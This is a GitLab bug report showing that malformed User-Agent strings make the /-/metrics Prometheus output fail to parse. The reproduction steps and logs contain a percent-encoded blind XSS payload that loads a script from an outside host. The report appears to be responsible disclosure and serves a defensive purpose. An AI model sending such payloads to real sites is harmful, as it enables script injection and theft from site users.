Rack_timeout parsing invalid strings causes issues
Summary
When visiting https://<gitlab>/-/metrics
to get the Prometheus metrics, it may return incorrect data because the string wasn't initially properly parsed.
Steps to reproduce
- Run GitLab 15.X+ (any version)
- Send a curl with the below user agent to attempt a XSS to any page (logs below are from the sign in page)
Mozilla/5.0 (X11; Linux x86_64) ResponsibleDisclosure-AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.116 Safari/537.36%22%3E%3Cscript%20src=https://blindbounty.xss.ht%3E%3C/script%3E%3Ccznkrm%3E
NOTE (scroll a bit to see full UA, contains XSS) Do NOT visit the URL, the string is an URL percent-encoded string.
- Send request to
https://<gitlab>/-/metrics
to get metrics - Observe as the output has
rack_requests_total{action="x\u003c/q\"g'j",controller="",route="",state="completed"}
When using promtool
the data is not usable:
$ curl -ks https://<gitlab>/-/metrics | ./promtool check metrics
error while linting: text format parsing error in line 9331: invalid escape sequence '\u'
Example Project
/
What is the current bug behavior?
The code used to parse the string incorrectly parses some data.
What is the expected correct behavior?
The string is properly parsed
Relevant logs and/or screenshots
Click to expand
./var/log/gitlab/gitlab-rails/production_json.log
{
"method": "GET",
"path": "/",
"format": "html",
"controller": "RootController",
"action": "index",
"status": 302,
"location": "https://DOMAIN/users/sign_in",
"time": "2022-09-20T08:29:12.212Z",
"params": [],
"correlation_id": "01GDD07X3Z3BCWCPGFRSSWHKNW",
"meta.caller_id": "RootController#index",
"meta.remote_ip": "VALID_IP",
"meta.feature_category": "projects",
"meta.client_id": "ip/VALID_IP",
"remote_ip": "VALID_IP",
"ua": "Mozilla/5.0 (X11; Linux x86_64) ResponsibleDisclosure-AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.116 Safari/537.36%22%3E%3Cscript%20src=https://blindbounty.xss.ht%3E%3C/script%3E%3Ccznkrm%3E",
"queue_duration_s": 0.006399,
"request_urgency": "low",
"target_duration_s": 5,
"db_count": 0,
"db_write_count": 0,
"db_cached_count": 0,
"db_replica_count": 0,
"db_primary_count": 0,
"db_main_count": 0,
"db_main_replica_count": 0,
"db_replica_cached_count": 0,
"db_primary_cached_count": 0,
"db_main_cached_count": 0,
"db_main_replica_cached_count": 0,
"db_replica_wal_count": 0,
"db_primary_wal_count": 0,
"db_main_wal_count": 0,
"db_main_replica_wal_count": 0,
"db_replica_wal_cached_count": 0,
"db_primary_wal_cached_count": 0,
"db_main_wal_cached_count": 0,
"db_main_replica_wal_cached_count": 0,
"db_replica_duration_s": 0.0,
"db_primary_duration_s": 0.0,
"db_main_duration_s": 0.0,
"db_main_replica_duration_s": 0.0,
"cpu_s": 0.019134,
"mem_objects": 10649,
"mem_bytes": 1211000,
"mem_mallocs": 2000,
"mem_total_bytes": 1636960,
"pid": 417387,
"worker_id": "puma_2",
"rate_limiting_gates": [],
"db_duration_s": 0.0,
"view_duration_s": 0.0,
"duration_s": 0.00804
}
./var/log/gitlab/gitlab-workhorse/current
{
"content_type": "text/html; charset=utf-8",
"correlation_id": "01GDD07X3Z3BCWCPGFRSSWHKNW",
"duration_ms": 22,
"host": "DOMAIN",
"level": "info",
"method": "GET",
"msg": "access",
"proto": "HTTP/1.1",
"referrer": "\u003cinvalid URL\u003e",
"remote_addr": "VALID_IP:0",
"remote_ip": "VALID_IP",
"route": "",
"status": 302,
"system": "http",
"time": "2022-09-20T10:29:12+02:00",
"ttfb_ms": 22,
"uri": "/",
"user_agent": "Mozilla/5.0 (X11; Linux x86_64) ResponsibleDisclosure-AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.116 Safari/537.36%22%3E%3Cscript%20src=https://blindbounty.xss.ht%3E%3C/script%3E%3Ccznkrm%3E",
"written_bytes": 108
}
Output of checks
This bug happens on GitLab.com 15.6.0-pre e154e978
Results of GitLab environment info
Expand for output related to GitLab environment info
(For installations with omnibus-gitlab package run and paste the output of: `sudo gitlab-rake gitlab:env:info`) (For installations from source run and paste the output of: `sudo -u git -H bundle exec rake gitlab:env:info RAILS_ENV=production`)
Results of GitLab application Check
Expand for output related to the GitLab application check
(For installations with omnibus-gitlab package run and paste the output of:
sudo gitlab-rake gitlab:check SANITIZE=true
)(For installations from source run and paste the output of:
sudo -u git -H bundle exec rake gitlab:check RAILS_ENV=production SANITIZE=true
)(we will only investigate if the tests are passing)